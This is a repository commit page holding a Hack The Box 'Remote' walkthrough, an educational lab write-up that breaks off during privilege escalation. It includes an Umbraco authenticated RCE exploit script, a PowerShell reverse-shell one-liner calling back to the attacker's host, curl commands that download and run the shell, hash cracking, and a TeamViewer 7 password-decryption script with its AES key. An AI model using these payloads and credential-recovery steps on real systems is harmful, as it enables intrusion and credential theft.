oxeo0/hacking-blogposts
1
0
Fork 0
mirror of http://git.nowherejezfoltodf4jiyl6r56jnzintap5vyjlia7fkirfsnfizflqd.onion/nihilist/hacking-blogposts.git synced 2025-07-02 10:36:41 +00:00
Code Issues Projects Releases Packages Wiki Activity Actions

add hacking blogposts as they are

Browse source
This commit is contained in:
oxeo0 2025-05-07 01:02:00 +02:00
parent fa65088be1
commit 325b9c3814
1904 changed files with 91353 additions and 0 deletions
Download patch file Download diff file Expand all files Collapse all files

719
Easy/44.md Normal file
View file

@ -0,0 +1,719 @@
# Remote Writeup
![](img/44.png)
## Introduction :
Remote is an easy Windows box released back in march 2020
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ nmap -vvv -p- 10.10.10.180 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
Discovered open port 80/tcp on 10.10.10.180
Discovered open port 111/tcp on 10.10.10.180
Discovered open port 135/tcp on 10.10.10.180
Discovered open port 139/tcp on 10.10.10.180
Discovered open port 445/tcp on 10.10.10.180
Discovered open port 21/tcp on 10.10.10.180
Discovered open port 49666/tcp on 10.10.10.180
Discovered open port 49678/tcp on 10.10.10.180
Discovered open port 5985/tcp on 10.10.10.180
Discovered open port 47001/tcp on 10.10.10.180
Discovered open port 49667/tcp on 10.10.10.180
Discovered open port 49665/tcp on 10.10.10.180
Discovered open port 2049/tcp on 10.10.10.180
Discovered open port 49664/tcp on 10.10.10.180
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ nmap -sCV 10.10.10.180 -p 21,80,111,135,445,2049
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-30 18:12 CEST
Nmap scan report for 10.10.10.180
Host is up (0.043s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7m35s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-30T16:21:22
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 83.57 seconds
## **Part 2 : Getting User Access**
Our nmap scan picked up port 21 FTP with anonymous login allowed, We can recursively get what's there with wget :
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ wget -r ftp://anonymous:anonymous@10.10.10.180/
However there are no files to get so we're going to continue exploring port 80 instead:
![](prg/44_001.png)
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ gobuster dir -u http://10.10.10.180 -w /usr/share/seclists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.180
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/05/30 18:42:03 Starting gobuster in directory enumeration mode
===============================================================
/Blog (Status: 200) [Size: 5001]
/Contact (Status: 200) [Size: 7880]
/Home (Status: 200) [Size: 6703]
/People (Status: 200) [Size: 6749]
/Products (Status: 200) [Size: 5338]
/about-us (Status: 200) [Size: 5451]
/blog (Status: 200) [Size: 5011]
/contact (Status: 200) [Size: 7890]
/home (Status: 200) [Size: 6703]
/install (Status: 302) [Size: 126] [--> /umbraco/]
/intranet (Status: 200) [Size: 3323]
/master (Status: 500) [Size: 3420]
/people (Status: 200) [Size: 6739]
/person (Status: 200) [Size: 2741]
/product (Status: 500) [Size: 3420]
/products (Status: 200) [Size: 5328]
/render/https://www.google.com (Status: 400) [Size: 3420]
/umbraco (Status: 200) [Size: 4040]
===============================================================
2021/05/30 18:43:05 Finished
===============================================================
Here we see that gobuster picked up the /umbraco/ directory:
![](prg/44_002.png)
Although we don't have credentials to get in yet. Our nmap scan picked up some available NFS shares on port 111, so let's enumerate those using the **showmount** utility:
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ apt search showmount
Sorting... Done
Full Text Search... Done
nfs-common/kali-rolling,now 1:1.3.4-5 amd64 [installed,automatic]
NFS support files common to client and server
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ sudo apt install nfs-common -y
[sudo] password for nothing:
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
nfs-common is already the newest version (1:1.3.4-5).
nfs-common set to manually installed.
0 upgraded, 0 newly installed, 0 to remove and 1 not upgraded.
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)
Here we see a mountable folder called site_backups, so let's mount it:
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ mkdir backups
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ sudo mount -t nfs 10.10.10.180:/site_backups backups/
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ ls -lash backups
total 123K
4.0K drwx------ 2 nobody 4294967294 4.0K Feb 23 2020 .
4.0K drwxr-xr-x 4 nothing nothing 4.0K May 30 19:40 ..
512 drwx------ 2 nobody 4294967294 64 Feb 20 2020 App_Browsers
4.0K drwx------ 2 nobody 4294967294 4.0K Feb 20 2020 App_Data
4.0K drwx------ 2 nobody 4294967294 4.0K Feb 20 2020 App_Plugins
512 drwx------ 2 nobody 4294967294 64 Feb 20 2020 aspnet_client
48K drwx------ 2 nobody 4294967294 48K Feb 20 2020 bin
8.0K drwx------ 2 nobody 4294967294 8.0K Feb 20 2020 Config
512 drwx------ 2 nobody 4294967294 64 Feb 20 2020 css
512 -rwx------ 1 nobody 4294967294 152 Nov 1 2018 default.aspx
512 -rwx------ 1 nobody 4294967294 89 Nov 1 2018 Global.asax
4.0K drwx------ 2 nobody 4294967294 4.0K Feb 20 2020 Media
512 drwx------ 2 nobody 4294967294 64 Feb 20 2020 scripts
8.0K drwx------ 2 nobody 4294967294 8.0K Feb 20 2020 Umbraco
4.0K drwx------ 2 nobody 4294967294 4.0K Feb 20 2020 Umbraco_Client
4.0K drwx------ 2 nobody 4294967294 4.0K Feb 20 2020 Views
28K -rwx------ 1 nobody 4294967294 28K Feb 20 2020 Web.config
Now here in the files we see that there are some Umbraco directories, and after searching a bit online, we see that there can be a server database in the **/App_Data** folder named **Umbraco.sdf**
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ strings backups/App_Data/Umbraco.sdf| grep Administrator
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminAdministratorsCADMOSKTPIURZ:5F7
Here we see that the Administrator user has a hashed password with the SHA1 algorithm, so let's attempt to crack it using john:
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ cat hash.txt
b8be16afba8c314ad33d812f22a04991b90e2aaa
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ john hash.txt --format=Raw-SHA1 -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 256/256 AVX2 8x])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
baconandcheese (?)
1g 0:00:00:00 DONE (2021-05-30 19:47) 1.282g/s 12594Kp/s 12594Kc/s 12594KC/s baconandchipies1..bacon918
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed
And we found the Administrator password for Umbraco: **baconandcheese** , so let's login:
![](prg/44_003.png)
Clicking help at the bottom left corner, we can see the version of this Umbraco instance:
![](prg/44_004.png)
And so we can look for CVEs for that Umbraco version:
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ searchsploit umbraco
------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------- ---------------------------------
Umbraco CMS - Remote Command Execution (Metasploit) | windows/webapps/19671.rb
**Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execu | aspx/webapps/46153.py**
Umbraco CMS 7.12.4 - Remote Code Execution (Authentica | aspx/webapps/49488.py
Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scrip | php/webapps/44988.txt
------------------------------------------------------- ---------------------------------
Shellcodes: No Results
And we get a few exploits to use for our Umbraco instance! Let's try the first RCE exploit:
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ cp $(locate 46153.py) .
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ cat 46153.py
# Exploit Title: Umbraco CMS - Remote Code Execution by authenticated administrators
# Dork: N/A
# Date: 2019-01-13
# Exploit Author: Gregory DRAPERI & Hugo BOUTINON
# Vendor Homepage: http://www.umbraco.com/
# Software Link: https://our.umbraco.com/download/releases
# Version: 7.12.4
# Category: Webapps
# Tested on: Windows IIS
# CVE: N/A
import requests;
from bs4 import BeautifulSoup;
def print_dict(dico):
print(dico.items());
print("Start");
# Execute a calc for the PoC
payload = '<****?xml version="1.0"?> <****xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\ <****msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
{ string**cmd = "wget 10.10.14.13/your_rce_attempt_worked!";** System.Diagnostics.Process proc = new System.Diagnostics.Process();\
proc.StartInfo.FileName = **"powershell.exe";** proc.StartInfo.Arguments = cmd;\
proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
<****/msxsl:script> <****xsl:template match="/"> <****xsl:value-of select="csharp_user:xml()"/>\ <****/xsl:template> <****/xsl:stylesheet> ';**login = "admin@htb.local";
password="baconandcheese";
host = "http://10.10.10.180";**
# Step 1 - Get Main page
s = requests.session()
url_main =host+"/umbraco/";
r1 = s.get(url_main);
print_dict(r1.cookies);
# Step 2 - Process Login
url_login = host+"/umbraco/backoffice/UmbracoApi/Authentication/PostLogin";
loginfo = {"username":login,"password":password};
r2 = s.post(url_login,json=loginfo);
# Step 3 - Go to vulnerable web page
url_xslt = host+"/umbraco/developer/Xslt/xsltVisualize.aspx";
r3 = s.get(url_xslt);
soup = BeautifulSoup(r3.text, 'html.parser');
VIEWSTATE = soup.find(id="__VIEWSTATE")['value'];
VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value'];
UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN'];
headers = {'UMB-XSRF-TOKEN':UMBXSRFTOKEN};
data = {"__EVENTTARGET":"","__EVENTARGUMENT":"","__VIEWSTATE":VIEWSTATE,"__VIEWSTATEGENERATOR":VIEWSTATEGENERATOR,"ctl00$body$xsltSelection":payload,"ctl00$body$contentPicker$ContentIdValue":"","ctl00$body$visualizeDo":"Visualize+XSLT"};
# Step 4 - Launch the attack
r4 = s.post(url_xslt,data=data,headers=headers);
print("End");%
Make sure you edit the values of login, password, host, powershell.exe and wget tun0/rcetest that i highlighted above, then proceed:
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ python3 46153.py
Start
[]
End
[ 10.10.14.13/23 ] [ /dev/pts/44 ] [~/HTB/Remote]
→ sudo python3 -m http.server 80
[sudo] password for nothing:
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.180 - - [31/May/2021 06:48:29] code 404, message File not found
10.10.10.180 - - [31/May/2021 06:48:29] "GET /your_rce_attempt_worked! HTTP/1.1" 404 -
And now after testing it we see that we have been able to get the machine to execute the wget command back to us, however [noraj](https://pwn.by/noraj/index.md) made a much better rewrite of this Umbraco RCE python exploit which allows us to pass arguements:
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ wget https://raw.githubusercontent.com/noraj/Umbraco-RCE/master/exploit.py
--2021-05-31 07:07:53-- https://raw.githubusercontent.com/noraj/Umbraco-RCE/master/exploit.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.109.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3202 (3.1K) [text/plain]
Saving to: exploit.py
exploit.py 100%[======================================================================================================================================================>] 3.13K --.-KB/s in 0s
2021-05-31 07:07:53 (6.52 MB/s) - exploit.py saved [3202/3202]
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ python3 exploit.py -h
usage: exploit.py [-h] -u USER -p PASS -i URL -c CMD [-a ARGS]
Umbraco authenticated RCE
optional arguments:
-h, --help show this help message and exit
-u USER, --user USER username / email
-p PASS, --password PASS password
-i URL, --host URL root URL
-c CMD, --command CMD command
-a ARGS, --arguments ARGS arguments
So let's use it:
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command whoami'
iis apppool\defaultapppool
We see that we can get remote code execution as the apppool user,
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command systeminfo'
Host Name: REMOTE
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00429-00521-62775-AA801
Original Install Date: 2/19/2020, 4:03:29 PM
System Boot Time: 5/30/2021, 12:07:27 PM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 4 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[03]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[04]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: VMware, Inc. VMW71.00V.13989454.B64.1906190538, 6/19/2019
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,745 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 3,426 MB
Virtual Memory: In Use: 1,373 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
**Hotfix(s): 5 Hotfix(s) Installed.
[01]: KB4534119
[02]: KB4462930
[03]: KB4516115
[04]: KB4523204
[05]: KB4464455**
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0 2
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.180
[02]: fe80::108b:625:aa40:7e42
[03]: dead:beef::108b:625:aa40:7e42
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
And we also are able to print out the infos about the server itself, including the current hotfixes. However we first need to get a reverse shell onto the box, let's find where the ftp folder is:
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command ls c:/'
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
**d----- 2/20/2020 1:13 AM ftp_transfer**
d----- 2/19/2020 3:11 PM inetpub
d----- 2/19/2020 11:09 PM Microsoft
d----- 9/15/2018 3:19 AM PerfLogs
d-r--- 2/23/2020 2:19 PM Program Files
d----- 2/23/2020 2:19 PM Program Files (x86)
**d----- 5/30/2021 11:07 AM site_backups**
d-r--- 2/19/2020 3:12 PM Users
d----- 2/20/2020 12:52 AM Windows
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command ls c:/ftp_transfer'
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command new-item c:/ftp_transfer/test.txt'
Directory: C:\ftp_transfer
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/31/2021 1:45 AM 0 test.txt
And as you can see, we are able to write to the **C:\ftp_transfer** directory so let's make use of it by first locally creating our powershell script containing our reverse shell payload:
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ vim shell.ps1
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ cat shell.ps1
$client = New-Object System.Net.Sockets.TCPClient(**"10.10.14.13",9001**);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
This will send a reverse shell connection back to our **tun0** interface on port **9001** once we get the box to execute it. In order to do that, we can get this script into the ftp_transfer directory we found earlier:
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command curl http://10.10.14.13:9090/shell.ps1 -o c:/ftp_transfer/shell.ps1'
[ 10.10.14.13/23 ] [ /dev/pts/44 ] [~/HTB/Remote]
→ ls -lash shell.ps1
4.0K -rw-r--r-- 1 nothing nothing 482 May 31 07:50 shell.ps1
[ 10.10.14.13/23 ] [ /dev/pts/44 ] [~/HTB/Remote]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
10.10.10.180 - - [31/May/2021 07:53:26] "GET /shell.ps1 HTTP/1.1" 200 -
Now that our shell.ps1 got uploaded, let's execute it:
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command c:/ftp_transfer/shell.ps1'
[ 10.10.14.13/23 ] [ /dev/pts/44 ] [~/HTB/Remote]
→ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.180] 49854
whoami
iis apppool\defaultapppool
And we got a reverse shell connection!
# cd c:\users\public
# ls
Directory: C:\users\public
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 2/19/2020 3:03 PM Documents
d-r--- 9/15/2018 3:19 AM Downloads
d-r--- 9/15/2018 3:19 AM Music
d-r--- 9/15/2018 3:19 AM Pictures
d-r--- 9/15/2018 3:19 AM Videos
-ar--- 5/30/2021 12:08 PM 34 user.txt
# cat user.txt
67XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And we managed to get the user flag!
## **Part 3 : Getting Root Access**
Now in order to privesc to the Administrator user on this box, we're going to run winpeas on the box:
[ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Remote]
→ cp $(locate winPEAS.ps1) .
[ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Remote]
→ ls -lash Invoke-winPEAS.ps1
228K -rw-r--r-- 1 nothing nothing 228K May 31 09:00 Invoke-winPEAS.ps1
[ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Remote]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
# cd C:\ftp_transfer
# curl http://10.10.14.13:9090/Invoke-winPEAS.ps1 -o peas.ps1
# import-module ./peas.ps1
# Invoke-winPEAS
So here we basically got our winpeas powershell module onto the box, then we imported it which gave us the Invoke-winPEAS command to execute:
![](prg/44_005.png)
Immediately winPEAS found 9 potential CVEs on the box:
![](prg/44_006.png)
However one of the intended privesc paths to follow was the TeamViewer v7 application that's installed on the box:
![](prg/44_007.png)
# cd 'C:\Program Files (x86)\TeamViewer\'
# ls
Directory: C:\Program Files (x86)\TeamViewer
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/31/2021 12:54 AM Version7
We're going to take advantage of this teamviewer version 7 software to privesc to the Administrator user like how it was described in this [blogpost](https://whynotsecurity.com/blog/teamviewer/):
First of all, TeamViewer7 stores the password in the registry under the value **SecurityPasswordAES** and this password is encrypted with **AES-128-CBC** , with the key set as **0602000000a400005253413100040000** and the Initialization Vector set as **0100010067244F436E6762F25EA8D704** , Looking up google a bit, we [find](https://community.teamviewer.com/English/kb/articles/16835-how-to-uninstall-teamviewer-on-pc) that the registry key for TeamViewer is under **HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer** :
# reg query HKLM\SOFTWARE\Wow6432Node\TeamViewer
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7
# reg query HKLM\SOFTWARE\Wow6432Node\TeamViewer\Version7
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7
StartMenuGroup REG_SZ TeamViewer 7
InstallationDate REG_SZ 2020-02-20
InstallationDirectory REG_SZ C:\Program Files (x86)\TeamViewer\Version7
Always_Online REG_DWORD 0x1
Security_ActivateDirectIn REG_DWORD 0x0
Version REG_SZ 7.0.43148
ClientIC REG_DWORD 0x11f25831
PK REG_BINARY BFAD2AEDB6C89AE0A0FD0501A0C5B9A5C0D957A4CC57C1884C84B6873EA03C069CF06195829821E28DFC2AAD372665339488DD1A8C85CDA8B19D0A5A2958D86476D82CA0F2128395673BA5A39F2B875B060D4D52BE75DB2B6C91EDB28E90DF7F2F3FBE6D95A07488AE934CC01DB8311176AEC7AC367AB4332ABD048DBFC2EF5E9ECC1333FC5F5B9E2A13D4F22E90EE509E5D7AF4935B8538BE4A606AB06FE8CC657930A24A71D1E30AE2188E0E0214C8F58CD2D5B43A52549F0730376DD3AE1DB66D1E0EBB0CF1CB0AA7F133148D1B5459C95A24DDEE43A76623759017F21A1BC8AFCD1F56FD0CABB340C9B99EE3828577371B7ADA9A8F967A32ADF6CF062B00026C66F8061D5CFF89A53EAE510620BC822BC6CC615D4DE093BC0CA8F5785131B75010EE5F9B6C228E650CA89697D07E51DBA40BF6FC3B2F2E30BF6F1C01F1BC2386FA226FFFA2BE25AE33FA16A2699A1124D9133F18B50F4DB6EDA2D23C2B949D6D2995229BC03507A62FCDAD55741B29084BD9B176CFAEDAAA9D48CBAF2C192A0875EC748478E51156CCDD143152125AE7D05177083F406703ED44DCACCD48400DD88A568520930BED69FCD672B15CD3646F8621BBC35391EAADBEDD04758EE8FC887BACE6D8B59F61A5783D884DBE362E2AC6EAC0671B6B5116345043257C537D27A8346530F8B7F5E0EBACE9B840E716197D4A0C3D68CFD2126E8245B01E62B4CE597AA3E2074C8AB1A4583B04DBB13F13EB54E64B850742A8E3E8C2FAC0B9B0CF28D71DD41F67C773A19D7B1A2D0A257A4D42FC6214AB870710D5E841CBAFCD05EF13B372F36BF7601F55D98ED054ED0F321AEBA5F91D390FF0E8E5815E6272BA4ABB3C85CF4A8B07851903F73317C0BC77FA12A194BB75999319222516
SK REG_BINARY F82398387864348BAD0DBB41812782B1C0ABB9DAEEF15BC5C3609B2C5652BED7A9A07EA41B3E7CB583A107D39AFFF5E06DF1A06649C07DF4F65BD89DE84289D0F2CBF6B8E92E7B2901782BE8A039F2903552C98437E47E16F75F99C07750AEED8CFC7CD859AE94EC6233B662526D977FFB95DD5EB32D88A4B8B90EC1F8D118A7C6D28F6B5691EB4F9F6E07B6FE306292377ACE83B14BF815C186B7B74FFF9469CA712C13F221460AC6F3A7C5A89FD7C79FF306CEEBEF6DE06D6301D5FD9AB797D08862B9B7D75B38FB34EF82C77C8ADC378B65D9ED77B42C1F4CB1B11E7E7FB2D78180F40C96C1328970DA0E90CDEF3D4B79E08430E546228C000996D846A8489F61FE07B9A71E7FB3C3F811BB68FDDF829A7C0535BA130F04D9C7C09B621F4F48CD85EA97EF3D79A88257D0283BF2B78C5B3D4BBA4307D2F38D3A4D56A2706EDAB80A7CE20E21099E27481C847B49F8E91E53F83356323DDB09E97F45C6D103CF04693106F63AD8A58C004FC69EF8C506C553149D038191781E539A9E4E830579BCB4AD551385D1C9E4126569DD96AE6F97A81420919EE15CF125C1216C71A2263D1BE468E4B07418DE874F9E801DA2054AD64BE1947BE9580D7F0E3C138EE554A9749C4D0B3725904A95AEBD9DACCB6E0C568BFA25EE5649C31551F268B1F2EC039173B7912D6D58AA47D01D9E1B95E3427836A14F71F26E350B908889A95120195CC4FD68E7140AA8BB20E211D15C0963110878AAB530590EE68BF68B42D8EEEB2AE3B8DEC0558032CFE22D692FF5937E1A02C1250D507BDE0F51A546FE98FCED1E7F9DBA3281F1A298D66359C7571D29B24D1456C8074BA570D4D0BA2C3696A8A9547125FFD10FBF662E597A014E0772948F6C5F9F7D0179656EAC2F0C7F
LastMACUsed REG_MULTI_SZ \0005056B9A169
MIDInitiativeGUID REG_SZ {514ed376-a4ee-4507-a28b-484604ed0ba0}
MIDVersion REG_DWORD 0x1
ClientID REG_DWORD 0x6972e4aa
CUse REG_DWORD 0x1
LastUpdateCheck REG_DWORD 0x5e72893c
UsageEnvironmentBackup REG_DWORD 0x1
**SecurityPasswordAES REG_BINARY FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B**
MultiPwdMgmtIDs REG_MULTI_SZ admin
MultiPwdMgmtPWDs REG_MULTI_SZ 357BC4C8F33160682B01AE2D1C987C3FE2BAE09455B94A1919C4CD4984593A77
Security_PasswordStrength REG_DWORD 0x3
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7\AccessControl
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7\DefaultSettings
We already see it but let's filter to just get the part we want:
# reg query HKLM\SOFTWARE\Wow6432Node\TeamViewer\Version7 /v SecurityPasswordAES
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7
**SecurityPasswordAES REG_BINARY FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B**
now that we got it, we can use the python script of the aforementionned blog post in order to decrypt the password:
import sys, hexdump, binascii
from Crypto.Cipher import AES
class AESCipher:
def __init__(self, key):
self.key = key
def decrypt(self, iv, data):
self.cipher = AES.new(self.key, AES.MODE_CBC, iv)
return self.cipher.decrypt(data)
key = binascii.unhexlify("0602000000a400005253413100040000")
iv = binascii.unhexlify("0100010067244F436E6762F25EA8D704")
**hex_str_cipher = "FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B"**
ciphertext = binascii.unhexlify(hex_str_cipher)
raw_un = AESCipher(key).decrypt(iv, ciphertext)
print(hexdump.hexdump(raw_un))
password = raw_un.decode('utf-16')
print(password)
[ 10.10.14.13/23 ] [ /dev/pts/49 ] [~/HTB/Remote]
→ pip3 install pycryptodome hexdump
Requirement already satisfied: pycryptodome in /home/nothing/.local/lib/python3.9/site-packages (3.10.1)
Requirement already satisfied: hexdump in /home/nothing/.local/lib/python3.9/site-packages (3.3)
